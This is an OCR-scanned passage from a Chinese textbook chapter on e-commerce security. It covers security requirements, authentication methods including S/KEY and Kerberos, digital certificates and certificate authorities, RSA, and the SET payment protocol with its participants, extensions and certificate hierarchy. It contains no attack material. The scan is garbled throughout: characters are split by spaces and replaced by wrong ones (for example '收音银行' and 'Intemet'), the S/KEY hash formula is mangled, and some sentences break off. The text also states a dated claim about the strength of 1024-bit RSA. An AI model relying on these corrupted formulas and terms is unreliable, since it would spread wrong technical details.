感 重要 的 商业 信息 进行 加 密 , 即使 别人 截获 或 窃取 了 数据 , 也 无 法 识别 信息 的 真实 内 容 ， 
这 样 就 可 以 使 商业 机 密 信 息 难以 被 泄露 。 

(3) 信息 完整 性 的 需求 

完整 性 (Integrity) 是 指 保护 数据 不 被 未 经 授权 者 修改 、 建 立 、 嵌 入 、 删 除 、 重 复 传 
送 或 者 由 于 其 他 原因 使 原始 数据 被 更 改 。 

因此 ， 保 证 信息 的 完整 性 也 是 电子 商务 活动 中 的 一 个 重要 的 安全 需求 。 这 意味 着 ， 
交易 各 方 能 够 验证 收 到 的 信息 是 否 完整 ， 即 信息 是 否 被 人 自 改 过 ， 或 者 在 数据 传输 过 程 
中 是 否 出 现 信息 丢失 、 信 息 重复 等 差错 。 

(4) 交易 信息 的 不 可 抵赖 性 需求 

不 可 抵赖 性 又 叫 不 可 和 否认 性 (Non-repudiation)， 是 指 信息 的 发 送 方 不 能 否认 已 经 发 
送 的 信息 ， 接 收 方 不 能 否认 已 经 收 到 的 信息 ， 只 是 一 种 法 律 有 效 性 要 求 。 

在 无 纸 化 的 电子 交易 中 ， 不 可 能 再 通过 传统 的 手写 签名 和 印章 来 预防 抵赖 行为 的 发 
生 。 因 此 ， 必 须 采 用 新 的 技术 ， 防 止 电子 商务 中 的 抵赖 行为 。 

因此 ， 保 证 交易 过 程 中 的 不 可 抵赖 性 也 是 电子 商务 安全 需求 中 的 一 个 重要 方面 。 这 
意味 着 ， 在 电子 交易 通信 过 程 的 各 个 环节 中 都 必须 是 不 可 否认 的 ， 即 交易 一 旦 达成 ， 发 
送 方 不 能 否认 它 发 送 的 信息 ， 接 收 方 则 不 能 否认 它 所 收 到 的 信息 。 
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(5) 商务 服务 的 有 效 性 需求 

商务 服务 的 有 效 性 或 可 用 性 ， 是 保证 授权 用 户 在 正常 访问 信息 和 资源 时 不 被 拒绝 ， 
即 保证 为 用 户 提供 稳定 的 服务 。 保 证 电子 形式 的 贸易 信息 的 有 效 性 是 展开 电子 商务 的 前 
提 。 电 子 商务 作为 贸易 的 一 种 形式 ， 其 信息 的 有 效 性 将 直接 关系 到 个 人 、 企 业 或 国家 的 
经 济 利益 和 声誉 。 因 此 ， 要 对 网 络 故障 、 操 作 错 误 、 应 用 程序 错误 、 硬 件 故 障 、 系 统 软 
件 错误 及 病毒 所 产生 的 潜在 威胁 加 以 控制 和 预防 ， 以 保证 不 受到 “延迟 ”服务 的 威胁 或 
“拒绝 服务 ”的 威胁 。 

(6) 访问 控制 性 需求 

访问 控制 性 (Access Control) 是 指 在 网 络 上 限制 和 控制 通信 链 路 对 主机 系统 和 应 用 
的 访问 。 用 于 保护 计算 机 系统 的 资源 〈 信 息 、 计 算 和 通信 资源 ) 不 被 未 经 授权 的 人 或 未 
授权 的 方式 接 入 、 使 用 、 修 改 、 破 坏 、 发 出 指令 或 植 入 程序 等 。 

简 而 言 之 ， 电 子 商务 要 安全 地 展开 ， 以 上 几 个 最 基本 的 安全 要 素 必须 实现 。 也 就 是 
说 ， 数 据 和 信息 的 隐私 必须 受到 保护 ， 交 易 者 身份 必须 得 到 认证 ， 并 且 具 有 可 认证 性 ， 
未 被 授权 的 进入 应 该 进行 控制 和 拒绝 。 
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随 着 计算 机 技术 的 发 展 和 社会 的 进步 ， 通 过 网 络 进行 的 电子 商务 活动 在 当今 社会 越 
来 越 频 繁 ， 身 份 认 证 是 一 个 不 得 不 解决 的 重要 问题 ， 它 将 直接 关系 到 电子 商务 活动 能 否 
高 效 而 有 序 地 进行 。 现 认证 技术 提供 了 关于 某 个 人 或 某 个 事物 身份 的 保证 ， 这 意味 着 当 
KA REID 声称 具有 一 个 特别 的 身份 〈 如 某 个 特定 的 用 户 名 称 ) 时 ， 认 证 技术 将 提 
供 某 种 方法 来 证 实 这 一 声明 是 正确 的 。 一 般 方法 是 输入 个 人 信息 ， 经 特定 的 公式 和 算法 
运算 所 得 的 结果 与 从 数据 库 中 存 取 的 信息 经 公式 和 算法 运算 所 得 结果 进行 比较 ， 得 出 
结论 。 

1. 身份 认证 技术 

身份 认证 过 程 指 的 是 当 用 户 试图 访问 资源 的 时 候 ， 系 统 确定 用 户 的 身份 是 否 真 实 的 
过 程 。 认 证 对 所 有 需要 安全 的 服务 来 说 是 至 关 重 要 的 , 因为 认证 是 访问 控制 执行 的 前 提 ， 
是 判断 用 户 是 否 有 权 访 问 信息 的 先决 条 件 , 同时 也 为 日 后 追究 责任 提供 不 可 抵赖 的 证 据 。 
通常 可 以 根据 以 下 5 种 信息 进行 认证 : 

© 用 户 所 知道 的 。 如 密码 认证 过 程 PAP (Password Authentication Procedure )。 当 用 
户 和 服务 器 建立 连接 后 ， 服 务 器 根据 用 户 输入 的 ID 和 密码 决定 是 满足 用 户 请 求 ， 还 是 
中 断 请 求 ， 或 是 再 提供 一 次 机 会 给 用 户 重新 输入 。 

@ 用 户 所 拥有 的 。 常 见 的 有 基于 智能 卡 的 认证 系统 ， 智 能 卡 即 是 用 户 所 拥有 的 标 
志 。 用 该 身份 卡 系统 可 以 判断 用 户 的 也 。 从 而 知道 用 户 是 否 合法 。 
© 用 户 本 身 的 特征 。 这 个 指 的 是 用 户 的 一 些 生 物 学 上 的 属性 ， 如 指纹 ， 虹 膜 特征 
等 。 因 为 模仿 这 些 特征 比较 难 ， 并 且 不 能 转让 ， 所 以 根据 这 些 信息 ， 就 可 以 识别 用 户 。 
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© 根据 特定 地 点 (或 特定 时 间 )。Bellcore 的 SKEY 一 次 一 密 系统 所 用 到 的 认证 方 
法 可 以 作为 一 个 例子 。 用 户 登录 的 时 候 ， 用 自己 的 密码 s 和 一 个 难 计算 的 单项 哈 希 函数 
万 计算 出 po = 1" (8) 作为 第 一 次 的 密 钥 , 以 后 第 i 次 的 密 钥 为 p; = f(s). XR 
特定 时 间 有 关 ， 及 跟 用 户 的 认证 次 数 i 有 关系 。 

© 通过 信任 的 第 三 方 。 典 型 的 为 Kerberos 认证 。 在 Kerberos 认证 中 ， 信 任 的 第 三 
方 包括 认证 服务 器 AS 和 票据 分 发 服务 器 TGS， 每 一 个 用 户 与 AS 共享 一 个 用 户 密 钥 。 
由 AS 对 用 户 进行 认证 并 颁发 访问 TGS 票据 ,用户 拿 到 票据 后 就 可 以 到 服务 器 进行 认证 。 

认证 在 一 个 安全 系统 中 起 着 至 关 重 要 的 作用 ， 认 证 技术 决定 了 系统 的 安全 程度 。 如 
何 评价 某 一 认证 技术 ， 可 以 遵循 以 下 几 个 标准 : 

(1) 可 行 性 

从 用 户 的 观点 看 ， 认 证 方法 应 该 提高 用 户 访问 应 用 的 效率 ， 减 少 多 余 的 交互 认证 过 
程 ， 提 供 一 次 性 认证 。 另 外 所 有 用 户 可 访问 的 资源 应 该 提供 友好 的 界面 给 用 户 访问 。 

(2) 认证 强度 

认证 强度 取决 于 采用 的 算法 的 复杂 度 以 及 密 钥 的 长 度 ， 采 用 越 复杂 的 算法 ， 越 长 的 
密 钥 ， 将 能 提高 系统 的 认证 强度 ， 提 高 系统 的 安全 性 。 

(3) 认证 粒度 

身份 认证 只 决定 是 否 允 许 用 户 进入 服务 应 用 。 之 后 如 何 控制 用 户 访问 的 内 容 ， 以 及 
控制 的 粒度 也 是 认证 系统 的 重要 标志 。 有 些 认 证 系统 仅 限于 判断 用 户 是 否 具 有 合法 身份 ， 
有 些 则 按 权 限 等 级 划分 成 几 个 密级 ， 严 格 控 制 用 户 按照 自己 所 属 的 密级 访问 。 

(4) 认证 数据 正确 

消息 的 接收 者 能 够 验证 消息 的 合法 性 、 真 实 性 和 完整 性 ， 而 消息 的 发 送 者 对 所 发 的 
消息 不 可 抵赖 。 除 了 合法 的 消息 发 送 者 外 ， 任 何其 他 人 不 能 伪造 合法 的 消息 。 当 通信 双 
方 (或 多 方 ) 发 生 争执 时 ， 有 公正 权威 的 第 三 方 解 决 纠纷 。 

(5) 不 同 协议 间 的 适应 性 

认证 系统 应 该 对 所 有 协议 的 应 用 进行 有 效 的 身份 识别 ， 除 了 HTTP， 安 全 Email 访 
问 也 是 企业 内 部 所 要 求 的 一 个 安全 控制 ， 其 中 包括 认证 SMTP, POP 或 者 IMAP。 这 些 
也 应 该 包含 在 认证 系统 中 。 

2. 数字 证 书 技术 

电子 商务 涉及 加 解密 ， 而 加 解密 必然 用 到 密 钥 。 从 密 钥 管理 工作 来 说 ， 怎 样 将 用 户 
的 密 钥 安全 地 分 发 到 用 户 端 ? 系统 可 以 处 理 多 少 密 钥 ? 用 户 是 否 需要 了 解密 钥 管理 ? 密 
钥 丢 失 后 怎么 办 ? 密 钥 失效 后 怎么 办 等 问题 很 自然 就 被 提出 来 了 。 

密 钥 的 管理 对 策 是 采用 数字 证 书 。 所 谓 数字 证 书 就 是 在 互联 网 通信 中 标志 通信 各 方 
身份 信息 的 一 系列 数据 ， 提 供 了 一 种 在 Internet 上 验证 用 户 身份 的 方式 ， 其 作用 类 似 于 
司机 的 鸭 驶 执照 或 日 常生 活 中 的 身份 证 。 它 是 由 一 个 由 权威 机 构 一 一 CA 机 构 ， 又 称 为 
证 书 授权 (Certificate Authority) 中 心 发 行 的 ， 人 们 可 以 在 网 上 用 它 来 识别 彼此 的 身份 。 
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CA 机 构 ， 又 称 为 证 书 授权 (Certificate Authority) 中 心 ， 作 为 电子 商务 交易 中 受信 
任 的 第 三 方 ， 承 担 公 钥 体系 中 公 钥 的 合法 性 检验 的 责任 。CA 中 心 为 每 个 使 用 公开 密 钥 
的 用 户 发 放 一 个 数字 证 书 ， 数 字 证 书 的 作用 是 证 明证 书 中 列 出 的 用 户 合法 拥有 证 书 中 列 
出 的 公开 密 钥 。CA 机 构 的 数字 签名 使 得 攻击 者 不 能 伪造 和 算 改 证 书 。 它 负责 产生 、 分 
配 并 管理 所 有 参与 网 上 交易 的 个 体 所 需 的 数字 证 书 ， 因 此 是 安全 电子 交易 的 核心 环节 。 

数字 证 书 采用 公 钥 体制 ， 即 利用 一 对 互相 匹配 的 密 钥 进行 加 密 、 解 密 。 每 个 用 户 自 
己 设 定 一 把 特定 的 仅 为 本 人 所 知 的 私有 密 钥 ( 私 钥 )， 用 它 进行 解密 和 签名 ;, 同时 设 定 一 
把 公共 密 钥 〈 公 钥 ) 并 由 本 人 公开 ， 为 一 组 用 户 所 共享 ， 用 于 加 密 和 验证 签名 。 当 发 送 
一 份 保 密 文 件 时 ， 发 送 方 使 用 接收 方 的 公 钥 对 数据 加 密 ， 而 接收 方 则 使 用 自己 的 私 钥 解 
密 ， 这 样 信息 就 可 以 安全 无 误 地 到 达 目 的 地 了 。 通 过 数字 的 手段 保证 加 密 过 程 是 一 个 不 
可 逆 过 程 ， 即 只 有 用 私有 密 钥 才 能 解密 。 

数字 证 书 与 传输 密 钥 和 签名 密 钥 对 的 产生 相对 应 。 对 每 一 个 公 钥 做 一 张 数 字 证 书 ， 
私 钥 用 最 安全 的 方式 交 给 用 户 或 用 户 自己 生产 密 钥 对 。 数 字 证 书 的 内 容 包括 用 户 的 公 钥 、 
用 户 姓名 、 发 证 机 构 的 数字 签名 及 用 户 的 其 他 一 些 身份 认证 的 有 用 信息 。 公 钥 的 拥有 者 
是 身份 的 象征 。 对 方 可 以 据 此 验证 身份 。 对 于 密 钥 的 丢失 情况 、 则 采用 恢复 密 钥 、 密 切 
托管 等 方法 。 另 外 对 于 证 书 的 有 效 期 在 政策 上 加 以 规定 、 已 过 期 的 证 书 应 重新 签发 ， 对 
于 私 钥 丢 失 或 被 非法 使 用 应 废止。 

在 公开 密 钥 密码 体制 中 , 常用 的 一 种 是 RSA 体制 。 其 数学 原理 是 将 一 个 大 数 分 解 成 
两 个 质数 的 乘积 ， 加 密 和 解密 用 的 是 两 个 不 同 的 密 钥 。 即 使 已 知 明文 、 密 文 和 加 密 密 钥 
(公开 密 钥 )， 想 要 推导 出 解密 密 钥 (私密 密 钥 ), 在 计算 上 是 不 可 能 的 。 按 现在 的 计算 机 
技术 水 平 ， 要 破解 目前 采用 的 1024 位 RSA 密 钥 ， 需 要 上 千年 的 计算 时 间 。 公 开 密 钥 技 
术 解 决 了 密 钥 发 布 的 管理 问题 ， 商 户 可 以 公开 其 公开 密 钥 ， 而 保留 其 私有 密 钥 。 购 物 者 
可 以 用 人 人 皆 知 的 公开 密 钥 对 发 送 的 信息 进行 加 密 ， 安 全 地 传送 给 商户 ， 然 后 由 商户 用 
自己 的 私有 密 钥 进 行 解密 。 


5.2.3 ”电子 商务 的 安全 服务 协议 


迄今 为 止 ， 国 内 外 已 经 出 现 了 多 种 电子 支付 协议 ， 目 前 有 两 种 安全 在 线 支付 协议 被 
广泛 采用 ， 分 别 为 安全 电子 交易 协议 (Secure Electronic Transaction, SET) 和 安全 套 接 
层 协 议 (Secure Socket Layer，SSL)， 二 者 均 是 成 熟 和 实用 的 安全 协议 。 

S.2.3.1 SET 协议 

在 开放 的 网 络 上 如 何 保证 交易 安全 、 可 靠 地 进行 ， 成 为 影响 电子 商务 能 否 普及 的 最 
重要 的 因素 之 一 。SET 正 是 在 这 种 背景 下 应 运 而 生 的 ， 它 针对 开放 网 络 上 安全 、 有 效 的 
银行 卡 交易 ， 为 Intemet 上 卡 支付 交易 提供 高 层 的 安全 和 反 欺 诈 保证 。 

1. SET 协议 简介 

在 Internet 上 开发 对 所 有 公众 开放 的 电子 商务 系统 ， 从 技术 角度 讲 ， 关 键 的 技术 问 


第 5 章 应 用 系统 安全 基础 


题 有 两 个 : 一 是 信息 传递 的 准确 性 ;二 是 信息 传递 的 安全 可 靠 性 。 前 者 是 各 种 数据 交换 
协议 已 经 解决 了 的 问题 , 后 者 则 是 目前 学 术 界 、 工 商界 和 消费 者 最 为 关注 的 问题 。 为 此 ， 
西方 学 者 和 企业 界 在 这 方面 投入 了 大 量 的 人 力 和 物力 。VISA 和 Master Card 以 及 其 他 一 
些 业界 的 主流 厂商 通过 多 年 的 研究 ， 于 1996 年 提出 了 SET (安全 电子 交易 ) 协议 ， 
TE 1997 年 5 月 正式 发 布 了 SET 1.0 标准 。 这 个 标准 自 推出 之 后 , 得 到 了 IBM、Netscape、 
Microsoft, Oracle 等 众多 厂商 的 支持 。SET 协议 是 应 用 层 的 协议 ， 是 一 种 基于 消息 流 的 
协议 ， 它 是 面向 B2C (Business to Consumer， 企 业 对 消费 者 ) 模式 的 ， 完 全 针对 信用 卡 
来 制定 ， 涵 盖 了 信用 卡 在 电子 商务 交易 中 的 交易 协议 信息 保密 、 资 料 完整 等 各 个 方面 。 
在 SET 协议 中 主要 定义 了 以 下 内 容 : 
。 加 密 算法 的 应 用 ; 
。 证书 消息 和 对 象 格式 ; 
。 购买 消息 和 对 象 格式 ; 
。 请 款 消息 和 对 象 格式 ; 
。 参与 者 之 间 的 消息 协议 。 
SET 协议 确保 了 网 上 交易 所 要 求 的 保密 性 、 数 据 的 完整 性 、 交 易 的 不 可 否认 性 和 交 
易 的 身份 认证 。SET 协议 主要 使 用 的 技术 包括 : 对 称 密 钥 加 密 、 公 钥 加 密 、Hash 算法 、 
数字 签名 、 数 字 信 封 以 及 数字 证 书 等 技术 。SET 通过 使 用 公 钥 和 对 称 密 钥 方式 加 密 ， 以 
保证 数据 的 保密 性 ; 通过 使 用 数字 签名 Hash 算法 和 数字 证 书 实现 交易 各 方 的 身份 认证 、 
数据 的 完整 性 和 交易 的 不 可 否认 性 。 
2. SET 协议 的 功能 和 实现 的 目标 
SET 协议 是 一 个 基于 可 信 的 第 三 方 认 证 中 心 的 方案 ， 其 主要 的 实现 目标 是 : 
。 保证 电子 商务 参与 者 信息 的 相互 隔离 。 持 卡 人 的 资料 加 密 或 打包 后 到 达 银 行 ， 商 
家 看 不 到 持 卡 人 的 账户 和 密码 信息 ， 银 行 看 不 到 持 卡 人 的 购物 信息 。 
。 保证 信息 在 Internet 上 安全 传输 ， 防 止 数 据 被 黑客 或 被 内 部 人 员 窃 取 。 
。 解决 多 方 认 证 问题 ， 不 仅 要 对 消费 者 的 信用 卡 认证 ， 而 且 要 对 在 线 商店 的 信誉 程 
度 认证 ， 同 时 还 有 消费 者 、 在 线 商 店 与 银行 间 的 认证 ， 保 证 付款 的 安全 。 
。 保证 网 上 交易 的 实时 性 ， 使 所 有 的 支付 过 程 都 是 在 线 的 。 
。 提供 一 个 开放 式 的 标准 、 规 范 协议 和 消息 格式 ， 促 使 不 同 厂家 开发 的 软件 具有 兼 
容 性 和 互 操作 功能 ， 并 且 可 运行 在 不 同 的 硬件 和 操作 系统 平台 上 。 
3. SET 交易 的 参与 方 介绍 
SET 改变 了 支付 系统 中 各 个 参与 者 之 间 交 互 的 方式 。 在 面对面 的 零售 交易 或 邮购 交 
易 中 , 电子 处 理 过 程 始 于 商家 或 付款 银行 ; 而 在 SET 交易 中 , 电子 支付 始 于 持 卡 人 。SET 
交易 的 参与 方 包括 持 卡 人 、 发 卡 机 构 、 商 家 、 收 单 银行 、 支 付 网 关 和 数字 证 书 认证 中 
ay CA. 
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(1) 持 卡 人 

在 电子 商务 环境 中 ， 消 费 者 和 团体 购买 者 通过 计算 机 与 商家 交流 ， 持 卡 人 通过 由 发 
卡 机 构 颁 发 的 付款 卡 〈 如 信用 卡 、 借 记 卡 ) 进行 结算 。 在 持 卡 人 和 商家 的 会 话 中 ，SET 
可 以 保证 持 卡 人 的 个 人 账号 信息 不 被 泄漏 。 

(2) 发 卡 机 构 

它 是 一 个 金融 机 构 ， 为 每 一 个 建立 了 账户 的 顾客 颁发 付款 卡 ， 发 卡 机 构 根 据 不 同 品 
牌 卡 的 规定 和 政策 ， 保 证 对 每 一 笔 认 证 交易 的 付款 。 


(3) 商家 
它 提供 商品 或 服务 ， 接 受 卡 支 付 的 商家 必须 和 银行 有 关系 。 
(4) 收音 银行 


在 线 交 易 的 商家 在 银行 开 立 账号 并 且 处 理 支付 卡 的 认证 和 支付 。 
(5) 支付 网 关 
支付 网 关 是 由 银行 操作 的 将 Internet 上 的 传输 数据 转换 为 金融 机 构 内 部 数据 的 设备 ， 
或 由 指派 的 第 三 方 处 理 商 家 支付 信息 和 顾客 的 支付 指令 。 
(6) 数字 证 书 认 证 中 心 (Certificate Authority, CA) 
它 的 主要 上 作 是 负责 SET 交易 数字 证 书 的 发 放 、 更 新 、 废 除 、 建 立 证 书 黑 名 单 等 各 
种 证 书 管 理 。 
4. SET 规范 和 采用 的 外 部 标准 
(1) SET 技术 规范 
SET 协议 分 为 三 个 部 分 : 
o 商业 描述 (The Business Description)。 提 供 处 理 的 总 述 。 
。 程序 员 指 导 (The Programmer’s Guide)。 介 绍 数据 区 、 消 息 以 及 处 理 流 程 ， 分 为 
系统 设计 考虑 、 证 书 管理 、 支 付 系 统 。 
。 正式 的 协议 定义 〈The Formal Protocol Definition)。 提 供 SET 消息 和 数据 区 最 严 
格 的 定义 ， 协 议定 义 采 用 ASN.1 语法 进行 。 
(2) SET 扩展 规范 
在 SET 原来 的 规范 中 没有 提供 其 他 的 商业 功能 ， 这 些 商业 功能 是 通过 SET 扩展 来 
提供 ， 截 至 2000 年 3 月 ， 己 经 公布 了 以 下 批准 的 扩展 : 
© CVV2/CVC2 扩展 (The CVV2/CVC2 extension)。 人 允许 购买 请 求 信息 携带 附加 的 
卡 验证 数据 。 
。 通用 密码 产生 器 扩展 (The Generic Cryptogram extensions)。 人 允许 信息 从 一 个 硬件 
标记 (hardware token) 得 到 ， 并 包含 在 持 卡 人 产生 的 支付 指令 中 。 
。 日 本 支付 选项 扩展 (The Japanese Payment Option extension)。 人 允许 持 卡 人 和 商家 
交互 特殊 信息 ， 这 些 信息 和 日 本 国内 特定 交易 相关 的 支付 选项 有 关 。 
© 商家 开始 非 SET 交易 的 授权 扩展 (The Merchant Initiated Authorization extension). 
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允许 一 个 商家 使 用 SET 消息 来 为 特定 订购 进行 授权 和 请 款 , 这 些 订 购 是 由 持 卡 人 
采用 非 SET 的 传输 方式 完成 的 。 
。 在 线 个 人 识别 号 扩展 (The Online PIN extensions)。 人 允许 个 人 标识 码 PIN 和 相关 
信息 包含 在 持 卡 人 产生 的 支付 指令 中 。 
。 通用 IC 卡 扩 展 (The Common Chip extension )。 在 购买 请 求 消息 中 ,为 传输 IC 卡 
中 的 数据 提供 一 种 方式 。 
(3) SET 采用 的 外 部 标准 
SET 的 设计 是 基于 各 种 工业 、Intemet 和 国际 组 织 的 标准 ， 这 些 标准 定义 在 ISO, 
IEFT, PKCS, ASN.1 "F, Wn FER SET 支持 的 这 些 标准 、 算 法 、 证 书 支持 。 
e ASN.1. ASN.1 (Abstract Syntax Notation) 是 SET 用 于 定义 消息 的 符号 。 
。 DER. DER (Distinguished Encoding Rules) 以 明确 清楚 的 形式 ， 实 现 支 付 消息 和 
证 书 中 的 协议 数据 的 编码 。 
。 DES。DES (Data Encryption Standard) 数据 加 密 标准 用 于 对 称 数 据 加 密 ，DES 密 
钥 采 用 一 个 加 密 形式 来 分 发 ， 该 加 密 形式 是 一 个 采用 公 和 钥 加 密 的 数字 信封 。 
e HMAC. HMAC 是 指 密 钥 Hash 机 制 (Keyed-hashing mechanism)， 用 于 共享 密 钥 
的 功能 。 
。 HTTP. HTTP 是 World Wide Web 的 传输 协议 ， 在 RFC 1945 中 定义 。 
。 MIME。MIME 用 于 支付 消息 的 封装 编码 ， 使 浏览 器 支持 和 识别 支付 消息 ， 也 能 
够 支持 电子 邮件 方式 的 商务 。 
。 PKCS. PKCS 用 于 定义 密码 消息 语法 (PKCS#7) 和 证 书 请 求 语法 (PKCS#10)。 
。 SHA-1。 单 向 杂凑 函数 ，SET 的 所 有 数字 签名 都 采用 SHA-1。 
e TCP/IP. TCP/IP 是 支持 Internet 通信 的 协议 集 。 
。X.509。 公 开 证 书 的 编码 标准 ，SET 支持 的 证 书 格式 定义 在 ISO 标准 X.509 版 本 
3 中 。 
5. SET 的 加 密 技 术 和 认证 技术 
SET 协议 是 一 种 电子 支付 系统 的 安全 协议 ， 因 此 它 涉 及 加 密 、 认 证 等 多 种 技术 。 
(1) 加 密 技 术 
加 密 技术 是 SET 协议 中 的 核心 技术 ， 在 SET 中 使 用 的 主要 包括 对 称 加 密 、 非 对 称 
加 密 、 数 字 签名 、 消 息 摘要 、 数 字 信封 、 双 重 签名 等 。 通 过 这 些 加 密 技术 的 使 用 ， 为 电 
子 交 易 的 过 程 提供 了 身份 的 认证 、 交 易 信 息 的 完整 性 、 信 息 的 机 密 性 和 交易 的 不 可 否 
(2) 认证 技术 
网 上 交易 的 买卖 双方 在 进行 每 一 笔 交易 时 ， 为 了 保证 交易 的 可 靠 性 ， 买 方 和 卖方 都 
要 鉴别 对 方 的 身份 。 交易 双方 可 以 通过 Intemet， 在 一 些 网 站 上 获取 对 方 的 公开 密 钥 ， 这 
种 办 法 虽然 有 效 可 行 , 但 这 种 方式 获取 的 公开 密 钥 不 可 靠 , 必须 要 对 这 些 密 钥 进行 验证 。 
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例如 ， 甲 方 不 能 简单 地 在 Intemet 上 向 乙方 询问 他 的 公开 密 钥 ， 因 为 在 网 络 上 可 能 存在 
居心 区 测 的 第 三 者 ， 他 很 有 可 能 截获 甲 方 请 求 ， 并 发 送 他 自己 的 公开 密 钥 ， 借 以 阅读 甲 
方 传送 给 乙方 的 所 有 消息 ， 并 有 可 能 假借 乙方 的 名 义 欺 骗 、 攻 击 甲 方 。 因 此 ， 需 要 一 个 
可 靠 的 第 三 方 来 验证 公 钥 确实 属于 乙方 ， 这 样 的 第 三 方 就 被 称 为 认证 机 构 〈 简 称 CA)。 
通过 认证 机 构 来 认证 交易 双方 身份 的 合法 性 , 是 保证 电子 支付 系统 安全 的 重要 措施 。CA 
的 主要 功能 有 : 接收 注册 请 求 处 理 、 批 准 /拒绝 请 求 、 发 行 证 书 。 处 理 流 程 中 ， 可 能 采取 
一 个 服务 器 设备 来 提供 CA 功能 ， 或 使 用 多 个 服务 器 来 发 行 和 处 理 请 求 。 

认证 技术 具体 涉及 以 下 一 些 内 容 : 

O 证 书信 息 

在 做 交易 时 ， 买 方 在 向 卖方 发 送 购物 信息 的 同时 ， 还 应 向 对 方 提交 一 个 由 CA 签发 
的 包含 个 人 身份 的 证 书 ， 以 使 对 方 相信 自己 的 合法 身份 。 顾 客 向 CA 申请 证 书 时 ， 可 提 
交 自 己 的 驾驶 执照 、 身 份 证 或 护照 ， 经 认证 机 构 验 证 后 ， 向 顾客 颁发 证 书 ， 证 书包 含 了 
顾客 的 名 字 和 他 的 公 钥 ， 以 此 作为 网 上 证 明 顾 客 合法 身份 的 依据 。 在 SET 中 ， 最 主要 的 
证 书 是 持 卡 人 证 书 和 商家 证 书 。 持 卡 人 证 书 实际 上 是 支付 卡 的 一 种 电子 化 的 表示 ， 它 是 
由 金融 机 构 以 数字 化 形式 签发 的 ， 因 此 不 能 随意 改变 。 持 卡 人 证 书 并 不 包括 账号 和 终止 
日 期 信息 这 样 的 敏感 信息 ， 而 是 用 单 向 Hash 算法 ， 根 据 帐号、 截止 日 期 生成 的 一 个 代 
码 。 如 果 知 道 账 号 、 和 截止 日 期 和 密码 值 ， 即 可 导出 这 个 代码 。 商 家 证 书 与 持 卡 人 证 书 的 
内 容 基 本 一 样 ， 其 作用 表示 在 商家 这 里 都 可 以 用 哪些 品牌 的 卡 来 结算 。 它 也 是 由 金融 机 
构 签发 的 ， 不 能 被 第 三 方 改变 。 在 SET 环境 中 ， 与 一 个 银行 打交道 ， 一 个 商家 至 少 应 有 
一 对 证 书 。 一 个 商家 也 可 以 有 多 对 证 书 ， 表 示 它 与 多 个 银行 有 合作 关系 ， 可 以 接受 多 种 
付款 方法 。 除 了 持 卡 人 证 书 和 商家 证 书 以 外 ， 还 有 支付 网 关 证 书 、 银 行 证 书 和 发 卡 机 构 
证 书 等 。 

持 卡 人 证 书 

持 卡 人 证 书 表明 持 卡 人 拥有 的 支付 卡 是 合法 的 ， 它 是 由 权威 的 金融 机 构 数字 签署 
的 ， 不 能 由 其 他 非法 第 三 方 产生 。 持 卡 人 证 书 不 包括 账号 和 过 期 日 期 ， 代 替 账 户 信息 的 
是 仅仅 由 持 卡 人 软件 知道 和 使 用 单 向 Hash 算法 产生 的 一 个 秘密 值 。 如 果 知 道 账 号 和 过 
期 日 期 以 及 该 Hash 值 数字 指纹 )， 可 以 验证 对 应 的 证 书 。 但 是 不 能 从 证 书 中 直接 得 到 
这 些 敏感 信息 。 在 SET 协议 中 ， 持 卡 人 向 支付 网 关 提 供用 于 验证 的 账户 信息 和 该 Hash 
值 。 只 有 当 持 卡 人 的 发 卡 金融 机 构 验证 用 户 后 , 才 向 持 卡 人 发 布 一 个 证 书 。 交 易 过 程 中 ， 
持 卡 人 证 书 和 加 密 的 支付 指示 发 向 商家 ， 商 家 收 到 持 卡 人 证 书 ， 能 够 最 低 限 度 验证 该 持 
卡 人 的 证 书 是 由 一 个 权威 金融 机 构 发 行 的 ， 并 且 是 可 靠 有 效 的 。 

商家 证 书 

商家 证 书 与 持 卡 人 证 书 基本 一 样 ， 也 是 由 商家 的 权威 的 金融 机 构 数字 签署 的 ， 商 家 
证 书 不 能 由 其 他 第 三 方 非法 发 行 ， 它 表示 商家 能 够 接收 该 支付 卡 的 消费 。 这 些 证 书 由 收 
单行 金融 机 构 认 证 ， 说 明 商 家 与 收 单行 达成 协议 。 在 SET 协议 中 ， 对 应 于 每 个 支付 卡 品 
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牌 ， 一 个 商家 都 拥有 一 个 证 书 。 一 个 商家 至 少 拥有 一 个 证 书 ， 也 可 以 有 多 个 证 书 。 
支付 网 关 证 书 
支付 网 关 证 书 由 收 单行 或 收 单行 的 处 理 系统 拥有 ， 持 卡 人 从 支付 网 关 证 书 得 到 公 钥 
来 加 密 保护 持 卡 人 的 账户 信息 ， 保 证 只 有 收 单行 才能 看 到 持 卡 人 的 账户 信息 。 支 付 网 关 
证 书 由 支付 卡 品牌 的 收 单行 发 行 。 


收 单行 证 书 

一 个 收音 银行 必须 拥有 证 书 ， 才 能 使 一 个 CA 接收 和 处 理 商家 从 公共 和 专用 网 络 发 
出 的 证 书 请 求 。 

发 卡 行 证 书 


一 个 发 卡 银行 必须 拥有 证 书 ，CA 才能 接收 和 处 理 来 自持 卡 人 的 证 书 请 求 ( 通 过 公 
共 或 专用 网 络 )， 那 些 选 择 支付 卡 品牌 来 代理 处 理 证 书 请 求 的 发 卡 行 不 需要 证 书 。 

@ 证 书 的 发 行 

SET 证 书 通过 一 个 信任 层次 来 验证 ,每 个 证 书 连 接 一 个 实体 的 数字 签名 的 签名 证 书 ， 
沿 着 信任 树 到 一 个 众所周知 的 信任 机 构 ， 用 户 可 以 保证 该 证 书 是 有 效 的 。 例 如 ， 一 个 持 
卡 人 证 书 连 接 一 个 发 卡 行 的 证 书 (或 代表 发 卡 行 的 品牌 ), 发 卡 行 证 书 通过 品牌 证 书 连接 
一 个 根 证 书 。 所 有 SET 软件 知道 根 证 书 的 公用 签名 密 钥 ， 可 用 于 验证 每 个 证 书 。 

根 密 钥 (Root key) HIR CA 自己 签名 来 发 布 ， 该 根 密 钥 证 书 由 软件 开发 商 插入 他 
们 的 软件 中 。 软 件 通过 向 CA 发 出 一 个 初始 化 请 求 〈 包 括 根 证 书 的 Hash 值 )， 可 以 确定 
一 个 密 钥 的 有 效 性 。 如 果 软 件 没有 一 个 有 效 的 根 证 书 ，CA 将 在 响应 中 发 出 一 个 根 密 钥 。 

当 根 证 书 产生 后 ， 一 个 替代 密 钥 也 产生 了 ， 替 代 密 钥 将 被 安全 保存 直到 需要 使 用 ， 
替代 密 钥 的 Hash 值 和 自 签名 的 根 证 书 是 同时 发 行 的 。 软 件 将 通过 包括 一 个 替代 根 密 钥 
的 自 签名 证 书 和 下 一 个 替代 根 密 钥 的 Hash 值 的 消息 来 指明 替代 者 。 软 件 通过 计算 它 的 
